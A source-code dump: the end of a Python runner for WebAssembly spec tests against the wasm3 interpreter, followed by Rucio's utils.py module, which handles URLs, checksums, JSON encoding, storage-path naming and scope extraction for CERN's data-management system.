if actual == expect or (expect == "<Anything>" and not force_fail):
stats.success += 1
log.write(f"OK: {actual}\n")
if args.line:
showTestResult()
else:
stats.failed += 1
log.write(f"FAIL: {actual}, should be: {expect}\n")
if args.silent: return
showTestResult()
#sys.exit(1)
if args.file:
jsonFiles = args.file
else:
jsonFiles = glob.glob(os.path.join(".", "core", "*.json"))
jsonFiles += glob.glob(os.path.join(".", "proposals", "sign-extension-ops", "*.json"))
jsonFiles += glob.glob(os.path.join(".", "proposals", "nontrapping-float-to-int-conversions", "*.json"))
jsonFiles = list(map(lambda x: os.path.relpath(x, scriptDir), jsonFiles))
jsonFiles.sort()
for fn in jsonFiles:
with open(fn, encoding='utf-8') as f:
data = json.load(f)
wast_source = filename(data["source_filename"])
wasm_module = ""
print(f"Running {fn}")
wasm3.init()
for cmd in data["commands"]:
test = dotdict()
test.line = int(cmd["line"])
test.source = wast_source + ":" + str(test.line)
test.wasm = wasm_module
test.type = cmd["type"]
if test.type == "module":
wasm_module = cmd["filename"]
if args.verbose:
print(f"Loading {wasm_module}")
try:
wasm_fn = os.path.join(pathname(fn), wasm_module)
wasm3.load(wasm_fn)
except Exception as e:
pass #fatal(str(e))
elif ( test.type == "action" or
test.type == "assert_return" or
test.type == "assert_trap" or
test.type == "assert_exhaustion" or
test.type == "assert_return_canonical_nan" or
test.type == "assert_return_arithmetic_nan"):
if args.line and test.line != args.line:
continue
if test.type == "action":
test.expected_anything = True
elif test.type == "assert_return":
test.expected = cmd["expected"]
elif test.type == "assert_return_canonical_nan":
test.expected = cmd["expected"]
test.expected[0]["value"] = "nan:canonical"
elif test.type == "assert_return_arithmetic_nan":
test.expected = cmd["expected"]
test.expected[0]["value"] = "nan:arithmetic"
elif test.type == "assert_trap":
test.expected_trap = cmd["text"]
elif test.type == "assert_exhaustion":
test.expected_trap = "stack overflow"
else:
stats.skipped += 1
warning(f"Skipped {test.source} ({test.type} not implemented)")
continue
test.action = dotdict(cmd["action"])
if test.action.type == "invoke":
# TODO: invoking in modules not implemented
if test.action.module:
stats.skipped += 1
warning(f"Skipped {test.source} (invoke in module)")
continue
test.action.field = escape_str(test.action.field)
runInvoke(test)
else:
stats.skipped += 1
warning(f"Skipped {test.source} (unknown action type '{test.action.type}')")
# These are irrelevant
elif (test.type == "assert_invalid" or
test.type == "assert_malformed" or
test.type == "assert_uninstantiable"):
pass
# Others - report as skipped
else:
stats.skipped += 1
warning(f"Skipped {test.source} ('{test.type}' not implemented)")
if (stats.failed + stats.success) != stats.total_run:
warning("Statistics summary invalid")
pprint(stats)
if stats.failed > 0:
failed = (stats.failed*100)/stats.total_run
print(f"{ansi.FAIL}=======================")
print(f" FAILED: {failed:.2f}%")
if stats.crashed > 0:
print(f" Crashed: {stats.crashed}")
print(f"======================={ansi.ENDC}")
sys.exit(1)
elif stats.success > 0:
print(f"{ansi.OKGREEN}=======================")
print(f" {stats.success}/{stats.total_run} tests OK")
if stats.skipped > 0:
print(f"{ansi.WARNING} ({stats.skipped} tests skipped){ansi.OKGREEN}")
print(f"======================={ansi.ENDC}")
|
utils.py
|
# -*- coding: utf-8 -*-
# Copyright 2012-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vincent.garonne@cern.ch>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2021
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2021
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2021
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquín Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2021
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Tomas Javurek <tomas.javurek@cern.ch>, 2019-2020
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - James Perry <j.perry@epcc.ed.ac.uk>, 2019-2021
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Jaroslav Guenther <jaroslav.guenther@cern.ch>, 2019-2020
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - root <root@escape-rucio-dev-oidc-r.cern.ch>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Mayank Sharma <mayank.sharma@cern.ch>, 2021
# - Rahul Chauhan <omrahulchauhan@gmail.com>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021
# - Anil Panta <47672624+panta-123@users.noreply.github.com>, 2021
# - Ilija Vukotic <ivukotic@cern.ch>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Joel Dierkes <joel.dierkes@cern.ch>, 2021
from __future__ import absolute_import, print_function
import argparse
import base64
import datetime
import errno
import getpass
import hashlib
import io
import itertools
import json
import logging
import mmap
import os
import os.path
import re
import socket
import subprocess
import tempfile
import threading
import time
import zlib
from collections import OrderedDict
from enum import Enum
from functools import partial
from uuid import uuid4 as uuid
from xml.etree import ElementTree
import requests
from six import string_types, text_type, binary_type, ensure_text, PY3
from six.moves import StringIO, zip_longest as izip_longest
from six.moves.urllib.parse import urlparse, urlencode, quote, parse_qsl, urlunparse
from six.moves.configparser import NoOptionError, NoSectionError
from rucio.common.config import config_get, config_has_section
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError, RucioException, \
DuplicateCriteriaInDIDFilter, DIDFilterSyntaxError
from rucio.common.extra import import_extras
from rucio.common.types import InternalAccount, InternalScope
EXTRA_MODULES = import_extras(['paramiko'])
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def build_url(url, path=None, params=None, doseq=False):
"""
Utility function to build a URL for requests to the Rucio system.
If the optional parameter doseq evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
if path is not None:
complete_url += "/" + path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
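# Usage sketch (hedged; the host and parameters are illustrative, not taken from this codebase):
#   >>> build_url('https://rucio.example.org', path='dids', params={'scope': 'user.jdoe'})
#   'https://rucio.example.org/dids?scope=user.jdoe'
#   >>> build_url('https://rucio.example.org', path='dids', params=[('type', ['dataset', 'container'])], doseq=True)
#   'https://rucio.example.org/dids?type=dataset&type=container'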
def all_oidc_req_claims_present(scope, audience, required_scope, required_audience, sepatator=" "):
"""
Checks if both of the following statements are true:
- all items in required_scope are present in scope
- all items in required_audience are present in audience
and returns True in that case, False otherwise. audience and scope must both be
strings or both be lists; the same applies to the required_* variables. If the
types do not match any supported combination, False is returned.
:params scope: list of strings or one string where items are separated by a separator input variable
:params audience: list of strings or one string where items are separated by a separator input variable
:params required_scope: list of strings or one string where items are separated by a separator input variable
:params required_audience: list of strings or one string where items are separated by a separator input variable
:params sepatator: separator string, space by default
:returns : True or False
"""
if not scope:
scope = ""
if not audience:
audience = ""
if not required_scope:
required_scope = ""
if not required_audience:
required_audience = ""
if (isinstance(scope, list) and isinstance(audience, list) and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope for elem in required_scope)
req_audience_present = all(elem in audience for elem in required_audience)
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) # NOQA: W504
and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = str(scope)
audience = str(audience)
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, list) and isinstance(audience, list) # NOQA: W504
and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) # NOQA: W504
and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = str(scope)
audience = str(audience)
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope)
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience)
return req_scope_present and req_audience_present
else:
return False
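# Usage sketch (hedged, illustrative claim values): scope/audience may be given as
# space-separated strings or as lists; every required item must be present.
#   >>> all_oidc_req_claims_present('openid profile', 'rucio', 'openid', 'rucio')
#   True
#   >>> all_oidc_req_claims_present(['openid'], ['rucio'], ['openid', 'profile'], ['rucio'])
#   False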
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
# GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5', 'sha256', 'crc32']
GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5']
CHECKSUM_ALGO_DICT = {}
PREFERRED_CHECKSUM = GLOBALLY_SUPPORTED_CHECKSUMS[0]
CHECKSUM_KEY = 'supported_checksums'
def is_checksum_valid(checksum_name):
"""
A simple function to check whether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
return checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS
def set_preferred_checksum(checksum_name):
"""
Sets the preferred checksum algorithm, provided it is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to set as preferred.
"""
if is_checksum_valid(checksum_name):
global PREFERRED_CHECKSUM
PREFERRED_CHECKSUM = checksum_name
def set_checksum_value(file, checksum_names_list):
for checksum_name in checksum_names_list:
if checksum_name in file['metadata'].keys() and file['metadata'][checksum_name]:
file['checksum'] = '%s:%s' % (checksum_name.upper(), str(file['metadata'][checksum_name]))
if checksum_name == PREFERRED_CHECKSUM:
break
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B
and concatenating their bits into a 32-bit integer. A is the sum of all bytes in
the stream plus one, and B is the sum of the individual values of A from each step.
:param file: file name
:returns: Hexified string, padded to 8 values.
"""
# adler starting value is _not_ 0
adler = 1
try:
with open(file, 'r+b') as f:
# memory map the file
m = mmap.mmap(f.fileno(), 0)
# partial block reads at slightly increased buffer sizes
for block in iter(partial(m.read, io.DEFAULT_BUFFER_SIZE), b''):
adler = zlib.adler32(block, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler32 checksum of file %s - %s' % (file, e))
# backflip on 32bit -- can be removed once everything is fully migrated to 64bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
CHECKSUM_ALGO_DICT['adler32'] = adler32
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
CHECKSUM_ALGO_DICT['md5'] = md5
def sha256(file):
"""
Runs the SHA256 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 64 hexadecimal digits
"""
with open(file, "rb") as f:
bytes_ = f.read() # read entire file as bytes
readable_hash = hashlib.sha256(bytes_).hexdigest()
print(readable_hash)
return readable_hash
CHECKSUM_ALGO_DICT['sha256'] = sha256
def crc32(file):
"""
Runs the CRC32 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: hexadecimal string of the 32-bit CRC value (at most 8 digits)
"""
prev = 0
for eachLine in open(file, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
CHECKSUM_ALGO_DICT['crc32'] = crc32
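# Usage sketch (hedged; the file path is illustrative): the registry above allows
# selecting a checksum implementation by name at runtime.
#   >>> algo = CHECKSUM_ALGO_DICT[PREFERRED_CHECKSUM]   # 'adler32' by default
#   >>> digest = algo('/path/to/local/file')            # hypothetical path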
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def val_to_space_sep_str(vallist):
""" Converts a list of values into a string of space separated values
:param vallist: the list of values to to convert into string
:return: the string of space separated values or the value initially passed as parameter
"""
try:
if isinstance(vallist, list):
return text_type(" ".join(vallist))
else:
return text_type(vallist)
except:
return text_type('')
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
# should not happen since the only date-like format
# supported at domain schema level is 'datetime'.
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, Enum):
return obj.name
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(list_):
""" JSON render function for list
"""
return json.dumps(list_, cls=APIEncoder)
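# Usage sketch (hedged; the field name is illustrative): APIEncoder serializes
# datetimes using the RFC 1123 DATE_FORMAT defined above.
#   >>> render_json(created_at=datetime.datetime(2013, 5, 13, 10, 23, 3))
#   '{"created_at": "Mon, 13 May 2013 10:23:03 UTC"}'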
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
if hasattr(data, 'decode'):
data = data.decode('utf-8')
return json.loads(data, object_hook=datetime_parser)
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
:param blocking: if False, return the subprocess.Popen object immediately instead of waiting
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out.decode(encoding='utf-8'), err.decode(encoding='utf-8')
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(list_, n):
"""
Yield successive n-sized chunks from l.
"""
for i in range(0, len(list_), n):
yield list_[i:i + n]
def dict_chunks(dict_, n):
"""
Iterate over the dictionary in groups of the requested size
"""
it = iter(dict_)
for _ in range(0, len(dict_), n):
yield {k: dict_[k] for k in itertools.islice(it, n)}
def my_key_generator(namespace, fn, **kw):
"""
Customized key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
elif nfields == 2:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[1], 'other', dsn, filename)  # only two fields exist here; fields[2] would raise IndexError
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
_SURL_ALGORITHMS = {}
_DEFAULT_SURL = 'DQ2'
_loaded_policy_modules = False
def register_surl_algorithm(surl_callable, name=None):
if name is None:
name = surl_callable.__name__
_SURL_ALGORITHMS[name] = surl_callable
register_surl_algorithm(construct_surl_T0, 'T0')
register_surl_algorithm(construct_surl_DQ2, 'DQ2')
register_surl_algorithm(construct_surl_BelleII, 'BelleII')
def _register_policy_package_surl_algorithms():
def try_importing_policy(vo=None):
import importlib
try:
package = config.config_get('policy', 'package' + ('' if not vo else '-' + vo['vo']))
module = importlib.import_module(package)
if hasattr(module, 'get_surl_algorithms'):
_SURL_ALGORITHMS.update(module.get_surl_algorithms())
except (NoOptionError, NoSectionError, ImportError):
pass
from rucio.common import config
from rucio.core.vo import list_vos
try:
multivo = config.config_get_bool('common', 'multi_vo')
except (NoOptionError, NoSectionError):
multivo = False
if not multivo:
# single policy package
try_importing_policy()
else:
# policy package per VO
vos = list_vos()
for vo in vos:
try_importing_policy(vo)
def construct_surl(dsn, filename, naming_convention=None):
global _loaded_policy_modules
if not _loaded_policy_modules:
# on first call, register any SURL functions from the policy packages
_register_policy_package_surl_algorithms()
_loaded_policy_modules = True
if naming_convention is None or naming_convention not in _SURL_ALGORITHMS:
naming_convention = _DEFAULT_SURL
return _SURL_ALGORITHMS[naming_convention](dsn, filename)
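# Usage sketch (hedged; the DSN and file name are illustrative): construct_surl
# dispatches on the naming convention registered above and falls back to 'DQ2'.
#   >>> construct_surl('/belle/MC/release-04/prod/mydata', 'file.root', naming_convention='BelleII')
#   '/belle/MC/release-04/prod/mydata/file.root'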
def __strip_dsn(dsn):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub(r'/srm/managerv1\?SFN=', '', surl)
surl = re.sub(r'/srm/v2/server\?SFN=', '', surl)
surl = re.sub(r'/srm/managerv2\?SFN=', '', surl)
if surl.startswith('https://storage.googleapis.com'):
surl = surl.split('?GoogleAccessId')[0]
if '?X-Amz' in surl:
surl = surl.split('?X-Amz')[0]
res.append(surl)
res.sort()
return res
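# Usage sketch (hedged; the endpoint is illustrative): SRM ports, web-service
# prefixes and access tokens are stripped so replicas can be compared by path.
#   >>> clean_surls(['srm://se.example.org:8446/srm/managerv2?SFN=/data/user/file1'])
#   ['srm://se.example.org/data/user/file1']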
_EXTRACT_SCOPE_ALGORITHMS = {}
_DEFAULT_EXTRACT = 'atlas'
def extract_scope_atlas(did, scopes):
# Try to extract the scope from the DSN
if did.find(':') > -1:
if len(did.split(':')) > 2:
raise RucioException('Too many colons. Cannot extract scope and name')
scope, name = did.split(':')[0], did.split(':')[1]
if name.endswith('/'):
name = name[:-1]
return scope, name
else:
scope = did.split('.')[0]
if did.startswith('user') or did.startswith('group'):
scope = ".".join(did.split('.')[0:2])
if did.endswith('/'):
did = did[:-1]
return scope, did
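# Usage sketch (hedged, illustrative DIDs): an explicit 'scope:name' is split on
# the colon, otherwise the scope is derived from the leading DSN field(s).
#   >>> extract_scope_atlas('user.jdoe:user.jdoe.test.file', scopes=None)
#   ('user.jdoe', 'user.jdoe.test.file')
#   >>> extract_scope_atlas('mc16_13TeV.12345.simulation', scopes=None)
#   ('mc16_13TeV', 'mc16_13TeV.12345.simulation')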
def extract_scope_belleii(did, scopes):
split_did = did.split('/')
if did.startswith('/belle/MC/'):
if did.startswith('/belle/MC/BG') or \
did.startswith('/belle/MC/build') or \
did.startswith('/belle/MC/generic') or \
did.startswith('/belle/MC/log') or \
did.startswith('/belle/MC/mcprod') or \
did.startswith('/belle/MC/prerelease') or \
did.startswith('/belle/MC/release'):
return 'mc', did
if did.startswith('/belle/MC/cert') or \
did.startswith('/belle/MC/dirac') or \
did.startswith('/belle/MC/dr3') or \
did.startswith('/belle/MC/fab') or \
did.startswith('/belle/MC/hideki') or \
did.startswith('/belle/MC/merge') or \
did.startswith('/belle/MC/migration') or \
did.startswith('/belle/MC/skim') or \
did.startswith('/belle/MC/test'):
return 'mc_tmp', did
if len(split_did) > 4:
if split_did[3].find('fab') > -1 or split_did[3].find('merge') > -1 or split_did[3].find('skim') > -1:
return 'mc_tmp', did
if split_did[3].find('release') > -1:
return 'mc', did
return 'mc_tmp', did
if did.startswith('/belle/Raw/'):
return 'raw', did
if did.startswith('/belle/hRaw'):
return 'hraw', did
if did.startswith('/belle/user/'):
if len(split_did) > 4:
if len(split_did[3]) == 1 and 'user.%s' % (split_did[4]) in scopes:
return 'user.%s' % split_did[4], did
if len(split_did) > 3:
if 'user.%s' % (split_did[3]) in scopes:
return 'user.%s' % split_did[3], did
return 'user', did
if did.startswith('/belle/group/'):
if len(split_did) > 4:
if 'group.%s' % (split_did[4]) in scopes:
return 'group.%s' % split_did[4], did
return 'group', did
if did.startswith('/belle/data/') or did.startswith('/belle/Data/'):
if len(split_did) > 4:
if split_did[3] in ['fab', 'skim']: # /belle/Data/fab --> data_tmp
return 'data_tmp', did
if split_did[3].find('release') > -1: # /belle/Data/release --> data
return 'data', did
if len(split_did) > 5:
if split_did[3] in ['proc']: # /belle/Data/proc
if split_did[4].find('release') > -1: # /belle/Data/proc/release*
if len(split_did) > 7 and split_did[6] in ['GCR2c', 'prod00000007', 'prod6b', 'proc7b',
'proc8b', 'Bucket4', 'Bucket6test', 'bucket6',
'proc9', 'bucket7', 'SKIMDATAx1', 'proc10Valid',
'proc10', 'SkimP10x1', 'SkimP11x1', 'SkimB9x1',
'SkimB10x1', 'SkimB11x1']: # /belle/Data/proc/release*/*/proc10/* --> data_tmp (Old convention)
return 'data_tmp', did
else: # /belle/Data/proc/release*/*/proc11/* --> data (New convention)
return 'data', did
if split_did[4].find('fab') > -1: # /belle/Data/proc/fab* --> data_tmp
return 'data_tmp', did
return 'data_tmp', did
if did.startswith('/belle/ddm/functional_tests/') or did.startswith('/belle/ddm/tests/') or did.startswith('/belle/test/ddm_test'):
return 'test', did
if did.startswith('/belle/BG/'):
return 'data', did
if did.startswith('/belle/collection'):
return 'collection', did
return 'other', did
def register_extract_scope_algorithm(extract_callable, name=None):
if name is None:
name = extract_callable.__name__
_EXTRACT_SCOPE_ALGORITHMS[name] = extract_callable
register_extract_scope_algorithm(extract_scope_atlas, 'atlas')
register_extract_scope_algorithm(extract_scope_belleii, 'belleii')
def extract_scope(did, scopes=None, default_extract=_DEFAULT_EXTRACT):
extract_scope_convention = config_get('common', 'extract_scope', False, None)
if extract_scope_convention is None or extract_scope_convention not in _EXTRACT_SCOPE_ALGORITHMS:
extract_scope_convention = default_extract
return _EXTRACT_SCOPE_ALGORITHMS[extract_scope_convention](did=did, scopes=scopes)
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
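# Usage sketch: the calling process always exists, so on UNIX this should hold.
#   >>> pid_exists(os.getpid())
#   True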
def sizefmt(num, human=True):
"""
Print human readable file sizes
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
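# Usage sketch (illustrative values): decimal (SI) units are used, not binary ones.
#   >>> sizefmt(1234567)
#   '1.235 MB'
#   >>> sizefmt(1234567, human=False)
#   '1234567'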
def get_tmp_dir():
"""
Get a path where to store temporary files.
Rucio searches a standard list of temporary directories. The list is:
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
The directory named by the TMP environment variable.
As a last resort, the /tmp/ directory.
:return: A path.
"""
base_dir = os.path.abspath(tempfile.gettempdir())
try:
return os.path.join(base_dir, getpass.getuser())
except Exception:
pass
try:
return os.path.join(base_dir, str(os.getuid()))
except Exception:
pass
return base_dir
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = r'^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
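# Usage sketch (illustrative file names):
#   >>> is_archive('logs.tar.gz')
#   True
#   >>> is_archive('data.root')
#   False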
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
Normally the client IP is set on the server side (request.remote_addr).
Here the IP is determined as seen by the host itself: a UDP socket is opened
towards the Google DNS servers, but no data is actually sent over it.
The site name is determined from common environment variables, in this order:
SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exists, the fixed
string 'ROAMING' is used.
If the RUCIO_LATITUDE and RUCIO_LONGITUDE environment variables are set, they
are used as the client location.
"""
ip = None
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
ip = '0.0.0.0'
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
